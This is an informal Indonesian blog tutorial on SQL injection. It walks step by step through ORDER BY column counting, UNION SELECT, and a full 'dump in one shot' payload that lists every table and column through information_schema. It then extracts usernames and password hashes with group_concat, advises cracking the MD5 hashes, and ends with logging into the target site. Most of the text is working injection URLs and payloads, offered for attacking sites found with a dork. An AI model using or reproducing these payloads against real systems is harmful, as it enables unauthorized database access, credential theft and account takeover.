oke guys ketemu lg neh sama cakil :v
kali ini saya akan kasih tutorial sqli dengan dios (dump in one shoot)
langsung ae guys
dork : sini
ok saya anggap lu udah punya target :v
lanjut masukan kode order by
+order+by+1--+ <- ga error
+order+by+2--+ <- ga error
dan seterus nya.. dan erorr nya ternyata ada di
+order+by+4--+ (yang berarti column hanya di 3)
oke kita masukan
+union+select+1,2,3--+ jadinya akan terlihat seperti inihttp://localhost/index.php?m2v=berita&id=12%27+order+by+3--+
dan muncul angka 1 dan 2 kita masukan dios nya :v (select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x) jadi akan seperti ini http://localhost/index.php?m2v=berita&id=12%27+union+select+1,
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3--+
ok skrng kita masukan
group_concat(username,0x3a,passwd)
nanti akan terlihat column yang kita dump
nanti akan seperti ini
http://localhost/index.php?m2v=berita&id=.12%27+union+select+1,
group_concat(username,0x3a,passwd
),3+from+tb_user--+ nah sudah muncul tuh :v mudah kan ?
jangan lupa karna password masih berupa md5 maka harus di decrypt
kamu bisa decrypt disini
tinggal login deh
ok sekian dan terima kasih :) kalo ada yang ingin di tanya kan silahkan
tanyakan di fp kami
link
){kind=link}
0 Comments